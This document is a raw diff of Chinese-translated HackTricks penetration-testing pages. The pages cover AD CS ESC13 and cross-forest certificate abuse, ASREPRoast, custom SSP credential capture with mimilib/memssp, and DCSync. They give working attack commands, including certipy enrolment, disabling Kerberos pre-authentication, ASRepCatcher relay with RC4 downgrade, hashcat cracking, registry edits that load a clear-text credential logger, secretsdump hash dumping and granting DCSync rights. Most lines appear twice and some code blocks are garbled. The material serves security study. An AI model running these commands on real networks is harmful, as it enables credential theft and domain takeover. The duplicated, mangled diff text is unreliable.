换句话说,当用户有权注册证书且该证书链接到 OID 组时,用户可以继承该组的权限
使用[Check-ADCSESC13.ps1](https://github.com/JonasBK/Powershell/blob/master/Check-ADCSESC13.ps1)查找OIDToGroupLink
使用 [Check-ADCSESC13.ps1](https://github.com/JonasBK/Powershell/blob/master/Check-ADCSESC13.ps1) 查找 OIDToGroupLink
```powershell
Enumerating OIDs
------------------------
@ -637,23 +638,42 @@ OID msDS-OIDToGroupLink: CN=VulnerableGroup,CN=Users,DC=domain,DC=local
```
### 滥用场景
找一个用户权限,可以使用 `certipy find``Certify.exe find /showAllPermissions`
一个用户权限,可以使用 `certipy find``Certify.exe find /showAllPermissions`
如果 `John` 有权限注册 `VulnerableTemplate`,则用户可以继承 `VulnerableGroup` 组的权。
如果 `John` 有权限注册 `VulnerableTemplate`,则用户可以继承 `VulnerableGroup` 组的权
只需指定模板,就可以获得具有 OIDToGroupLink 权限的证书。
所需的只是指定模板,它将获得具有 OIDToGroupLink 权限的证书。
```bash
certipy req -u "John@domain.local" -p "password" -dc-ip 192.168.100.100 -target "DC01.domain.local" -ca 'DC01-CA' -template 'VulnerableTemplate'
```
## 通过证书解释被动语态下的森林妥协
## 用被动语态解释的证书妥协森林
### 通过被入侵的CA打破森林信任
### 被妥协的CA破坏森林信任
**跨森林注册**的配置相对简单。资源森林的**根CA证书**由管理员**发布到账户森林**,资源森林的**企业CA证书**被**添加到每个账户森林的`NTAuthCertificates`和AIA容器**中。澄清一下,这种安排赋予了资源森林中的**CA对其管理的所有其他森林完全控制**。如果这个CA被攻击者**入侵**,则资源和账户森林中所有用户的证书可能被他们**伪造**,从而打破了森林的安全边界。
**跨森林注册**的配置相对简单。资源森林的**根CA证书**由管理员**发布到账户森林**,资源森林的**企业CA**证书被**添加到每个账户森林中的`NTAuthCertificates`和AIA容器**。为了澄清,这种安排授予资源森林中的**CA对其管理的所有其他森林的完全控制权**。如果该CA被**攻击者妥协**,则资源森林和账户森林中所有用户的证书都可能被**伪造**,从而打破森林的安全边界。
### 授予外部主体的注册
### 授予外部主体的注册权
在多森林环境中,需要谨慎处理**发布证书模板**的企业CA这些模板允许**经过身份验证的用户或外部主体**属于企业CA所属森林之外的用户/组)**注册和编辑权限**。\
跨域认证时AD会将**经过身份验证的用户SID**添加到用户的令牌中。因此,如果一个域拥有一个允许**经过身份验证的用户注册权限**的企业CA模板一个来自不同森林的用户可能会**注册该模板**。同样,如果**模板明确授予外部主体注册权限**,则会创建一个**跨森林访问控制关系**,使一个森林的主体能够**在另一个森林中注册模板**。
在多森林环境中,关于**发布证书模板**的企业CA需要谨慎这些模板允许**经过身份验证的用户或外部主体**属于企业CA所在森林的外部用户/组)**注册和编辑权限**。\
信任关系中进行身份验证后,**经过身份验证的用户SID**会被AD添加到用户的令牌中。因此如果一个域拥有一个企业CA其模板**允许经过身份验证的用户注册权限**,则来自不同森林的用户可能会**注册该模板**。同样,如果**模板明确授予外部主体注册权限**,则**跨森林访问控制关系由此创建**,使得一个森林中的主体能够**注册另一个森林中的模板**。
这两种情况都会导致从一个森林到另一个森林的**攻击面增加**。证书模板的设置可能被攻击者利用,以在外部域中获取额外权限。
这两种情况都会导致**攻击面从一个森林增加到另一个森林**。攻击者可以利用证书模板的设置在外部域中获得额外权限。
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
学习和实践AWS黑客技术<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks培训AWS红队专家(ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践GCP黑客技术<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks培训GCP红队专家(GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary>支持HackTricks</summary>
* 查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f)或[**电报群组**](https://t.me/peass)或**在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub库提交PR分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,47 +1,48 @@
# ASREPRoast
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在**Twitter**上关注我们 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入[**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy)服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客的刺激挑战的内容
参与深入探讨黑客的刺激挑战的内容
**实时黑客新闻**\
通过实时新闻和见解及时了解快节奏的黑客世界
通过实时新闻和见解,跟上快速变化的黑客世界
**最新公告**\
通过最新的漏洞赏金发布和重要平台更新保持信息更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作
**今天就加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作吧
## ASREPRoast
ASREPRoast是一种安全攻击,利用缺乏**Kerberos预身份验证所需属性**的用户。基本上这种漏洞允许攻击者向域控制器DC请求用户的身份验证而无需知道用户的密码。然后DC会用用户的密码派生密钥加密消息进行响应攻击者可以尝试脱机破解以发现用户的密码。
ASREPRoast 是一种安全攻击,利用缺乏 **Kerberos 预身份验证所需属性** 的用户。实质上,这个漏洞允许攻击者向域控制器 (DC) 请求用户的身份验证而无需用户的密码。然后DC 会用用户密码派生的密钥加密消息进行响应,攻击者可以尝试离线破解以发现用户的密码。
这种攻击的主要要求包括
此攻击的主要要求是
* **缺乏Kerberos预身份验证**:目标用户必须未启用此安全功能。
* **连接到域控制器DC**攻击者需要访问DC以发送请求和接收加密消息。
* **可选的域帐户**拥有域帐户可以使攻击者通过LDAP查询更有效地识别易受攻击的用户。如果没有这样的帐户,攻击者必须猜测用户名。
* **缺乏 Kerberos 预身份验证**:目标用户必须未启用此安全功能。
* **连接到域控制器 (DC)**:攻击者需要访问 DC 以发送请求并接收加密消息。
* **可选的域账户**:拥有域账户可以让攻击者通过 LDAP 查询更有效地识别易受攻击的用户。没有这样的账户,攻击者必须猜测用户名。
#### 枚举易受攻击用户(需要域凭据)
#### 枚举易受攻击用户(需要域凭据)
{% code title="使用Windows" %}
{% code title="使用 Windows" %}
```bash
Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
```
@ -51,7 +52,7 @@ Get-DomainUser -PreauthNotRequired -verbose #List vuln users using PowerView
```bash
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(userAccountControl:1.2.840.113556.1.4.803:=4194304)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))' --attr sAMAccountName
```
#### 请求 AS_REP 消息
#### 请求 AS\_REP 消息
{% code title="使用 Linux" %}
```bash
@ -70,7 +71,7 @@ Get-ASREPHash -Username VPN114user -verbose #From ASREPRoast.ps1 (https://github
{% endcode %}
{% hint style="warning" %}
使用Rubeus进行AS-REP Roasting将生成一个加密类型为0x17且预身份验证类型为0的4768
使用 Rubeus 进行 AS-REP Roasting 将生成一个 4768加密类型为 0x17预身份验证类型为 0
{% endhint %}
### 破解
@ -80,9 +81,9 @@ hashcat -m 18200 --force -a 0 hashes.asreproast passwords_kerb.txt
```
### 持久性
对于具有**GenericAll**权限(或写入属性权限)的用户,强制**preauth**不是必需的:
强制 **preauth** 对于您拥有 **GenericAll** 权限(或写入属性的权限)的用户不是必需的:
{% code title="使用Windows" %}
{% code title="Using Windows" %}
```bash
Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbose
```
@ -92,10 +93,12 @@ Set-DomainObject -Identity <username> -XOR @{useraccountcontrol=4194304} -Verbos
```bash
bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 add uac -f DONT_REQ_PREAUTH
```
## 无凭证的ASREProast
{% endcode %}
攻击者可以利用中间人位置捕获AS-REP数据包而无需依赖Kerberos预身份验证被禁用。因此它适用于VLAN上的所有用户。\
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher)使我们能够做到这一点。此外该工具通过更改Kerberos协商来强制客户工作站使用RC4。
## 无凭据的ASREProast
攻击者可以利用中间人位置捕获AS-REP数据包因为它们在网络中传输而不依赖于Kerberos预身份验证被禁用。因此它适用于VLAN上的所有用户。\
[ASRepCatcher](https://github.com/Yaxxine7/ASRepCatcher) 允许我们这样做。此外该工具通过更改Kerberos协商强制客户端工作站使用RC4。
```bash
# Actively acting as a proxy between the clients and the DC, forcing RC4 downgrade if supported
ASRepCatcher relay -dc $DC_IP
@ -106,7 +109,7 @@ ASRepCatcher relay -dc $DC_IP --disable-spoofing
# Passive listening of AS-REP packets, no packet alteration
ASRepCatcher listen
```
## 参考资料
## 参考文献
* [https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/as-rep-roasting-using-rubeus-and-hashcat)
@ -114,29 +117,30 @@ ASRepCatcher listen
<figure><img src="../../.gitbook/assets/image (380).png" alt=""><figcaption></figcaption></figure>
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和赏金猎人交流!
加入 [**HackenProof Discord**](https://discord.com/invite/N3FrSbmwdy) 服务器,与经验丰富的黑客和漏洞赏金猎人交流!
**黑客见解**\
参与深入探讨黑客行为的刺激和挑战的内容
参与深入探讨黑客的刺激与挑战的内容
**实时黑客新闻**\
通过实时新闻和见解了解快节奏的黑客世界
通过实时新闻和见解,保持对快速变化的黑客世界的了解
**最新公告**\
了解最新的赏金任务发布和重要平台更新
了解最新的漏洞赏金计划和重要平台更新
**加入我们的** [**Discord**](https://discord.com/invite/N3FrSbmwdy) 并开始与顶尖黑客合作!
**今天就加入我们,** [**Discord**](https://discord.com/invite/N3FrSbmwdy),与顶尖黑客开始合作!
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,70 +1,70 @@
# Custom SSP
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS红队专家</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
其他支持HackTricks的方式
* 如果您想看到您的**公司在HackTricks中做广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 探索[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
### 自定义SSP
### Custom SSP
[了解什么是SSP安全支持提供者请点击这里。](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\
您可以创建**自己的SSP**来**捕获**以**明文**形式访问计算机所使用的**凭据**
[在这里了解什么是 SSP安全支持提供者。](../authentication-credentials-uac-and-efs/#security-support-provider-interface-sspi)\
您可以创建**自己的 SSP****捕获** 用于访问机器的 **凭据****明文**
#### Mimilib
您可以使用Mimikatz提供的`mimilib.dll`二进制文件。**这将在文件中记录所有明文凭据。**\
将dll放入`C:\Windows\System32\`\
获取现有LSA安全包的列表
您可以使用 Mimikatz 提供的 `mimilib.dll` 二进制文件。**这将把所有凭据以明文记录在一个文件中。**\
dll 放入 `C:\Windows\System32\`\
获取现有 LSA 安全包的列表:
{% code title="attacker@target" %}
```
```bash
PS C:\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY_LOCAL_MACHINE\system\currentcontrolset\control\lsa
Security Packages REG_MULTI_SZ kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u
```
{% endcode %}
\`\`\`bash PS C:\\> reg query hklm\system\currentcontrolset\control\lsa\ /v "Security Packages"
HKEY\_LOCAL\_MACHINE\system\currentcontrolset\control\lsa Security Packages REG\_MULTI\_SZ kerberos\0msv1\_0\0schannel\0wdigest\0tspkg\0pku2u
````
将`mimilib.dll`添加到安全支持提供程序列表(安全包)中:
`mimilib.dll` 添加到安全支持提供程序列表(安全包):
```powershell
reg add "hklm\system\currentcontrolset\control\lsa\" /v "Security Packages"
````
```
并且在重启后,所有凭据可以在 `C:\Windows\System32\kiwissp.log` 中以明文形式找到。
#### 在内存中
您还可以直接使用 Mimikatz 将其注入到内存中(请注意,这可能会有点不稳定/无法正常工作):
您还可以直接使用 Mimikatz 将其注入内存中(请注意,这可能会有点不稳定/无法工作):
```powershell
privilege::debug
misc::memssp
```
这不会在重启后存活。
这种方法在重启后无法生存。
#### 缓解措施
#### 缓解
事件 ID 4657 - 审计创建/更改 `HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages`
事件ID 4657 - 审计`HKLM:\System\CurrentControlSet\Control\Lsa\SecurityPackages`的创建/更改
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想看到您的**公司在HackTricks中被广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** 上关注我们。**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -3,38 +3,39 @@
<figure><img src="../../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=dcsync) 来轻松构建和**自动化工作流**,使用世界上**最先进**的社区工具。\
立即获取访问权限:
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=dcsync) 轻松构建和 **自动化工作流程**,由世界上 **最先进** 的社区工具提供支持。\
今天获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=dcsync" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版本的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或在 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)** 上关注我们**。
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
## DCSync
**DCSync** 权限意味着对域本身有以下权限:**DS-Replication-Get-Changes**、**Replicating Directory Changes All** 和 **Replicating Directory Changes In Filtered Set**
**DCSync** 权限意味着对域本身有以下权限:**DS-Replication-Get-Changes**、**Replicating Directory Changes All** 和 **Replicating Directory Changes In Filtered Set**
**关于 DCSync 的重要说明:**
**关于 DCSync 的重要说明**
* **DCSync 攻击模拟域控制器的行为,并要求其他域控制器使用目录复制服务远程协议MS-DRSR复制信息**。由于 MS-DRSR 是 Active Directory 的有效且必要功能,因此无法关闭或禁用。
* 默认情况下,只有 **域管理员、企业管理员、管理员和域控制器** 组具有所需的权。
* 如果任何帐户密码以可逆加密方式存储Mimikatz 中有一个选项可以返回明文密码
* **DCSync 攻击模拟域控制器的行为,并请求其他域控制器复制信息**,使用目录复制服务远程协议 (MS-DRSR)。由于 MS-DRSR 是 Active Directory 的有效且必要功能,因此无法关闭或禁用。
* 默认情况下,只有 **域管理员、企业管理员、管理员和域控制器** 组具有所需的权
* 如果任何帐户密码以可逆加密存储Mimikatz 中提供了一个选项可以以明文返回密码。
### 枚举
### Enumeration
使用 `powerview` 检查具有这些权限的用户
使用 `powerview` 检查谁拥有这些权限
```powershell
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{($_.ObjectType -match 'replication-get') -or ($_.ActiveDirectoryRights -match 'GenericAll') -or ($_.ActiveDirectoryRights -match 'WriteDacl')}
```
@ -51,9 +52,9 @@ secretsdump.py -just-dc <user>:<password>@<ipaddress> -outputfile dcsync_hashes
```
`-just-dc` 生成 3 个文件:
* 一个包含 **NTLM 哈希** 的文件
* 一个包含 **Kerberos 密钥** 的文件
* 一个包含启用了[**可逆加密**](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption)的 NTDS 中明文密码的文件。您可以使用以下命令获取启用了可逆加密的用户:
* 一个包含 **NTLM 哈希**
* 一个包含 **Kerberos 密钥**
* 一个包含 NTDS 中任何设置了 [**可逆加密**](https://docs.microsoft.com/en-us/windows/security/threat-protection/security-policy-settings/store-passwords-using-reversible-encryption) 的帐户的明文密码。您可以通过以下命令获取具有可逆加密的用户:
```powershell
Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD_ALLOWED*'} |select samaccountname,useraccountcontrol
@ -61,44 +62,45 @@ Get-DomainUser -Identity * | ? {$_.useraccountcontrol -like '*ENCRYPTED_TEXT_PWD
### 持久性
如果您是域管理员,可以借助 `powerview` 将此权限授予任何用户:
如果您是域管理员,可以借助 `powerview` 将此权限授予任何用户:
```powershell
Add-ObjectAcl -TargetDistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -PrincipalSamAccountName username -Rights DCSync -Verbose
```
然后,您可以**检查用户是否正确分配**了这3个特权,通过查找它们在输出中的名称(您应该能够在"ObjectType"字段中看到特权的名称):
然后,您可以**检查用户是否正确分配**了这3个权限通过在输出中查找它们您应该能够在“ObjectType”字段中看到权限的名称):
```powershell
Get-ObjectAcl -DistinguishedName "dc=dollarcorp,dc=moneycorp,dc=local" -ResolveGUIDs | ?{$_.IdentityReference -match "student114"}
```
### 缓解措施
### Mitigation
* 安全事件 ID 4662(必须启用对象的审核策略)- 对对象执行了操作
* 安全事件 ID 5136(必须启用对象的审核策略)- 修改了目录服务对象
* 安全事件 ID 4670(必须启用对象的审核策略)- 更改了对象的权限
* AD ACL Scanner - 创建和比较 ACL 的创建报告。[https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)
* 安全事件 ID 4662 (对象的审计策略必须启用) 对一个对象执行了操作
* 安全事件 ID 5136 (对象的审计策略必须启用) 修改了一个目录服务对象
* 安全事件 ID 4670 (对象的审计策略必须启用) 对一个对象的权限进行了更改
* AD ACL 扫描器 - 创建和比较 ACL 的创建报告。 [https://github.com/canix1/ADACLScanner](https://github.com/canix1/ADACLScanner)
## 参考资料
## References
* [https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync](https://www.ired.team/offensive-security-experiments/active-directory-kerberos-abuse/dump-password-hashes-from-domain-controller-with-dcsync)
* [https://yojimbosecurity.ninja/dcsync/](https://yojimbosecurity.ninja/dcsync/)
{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>Support HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFT**](https://opensea.io/collection/the-peass-family) 收藏品
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
</details>
{% endhint %}
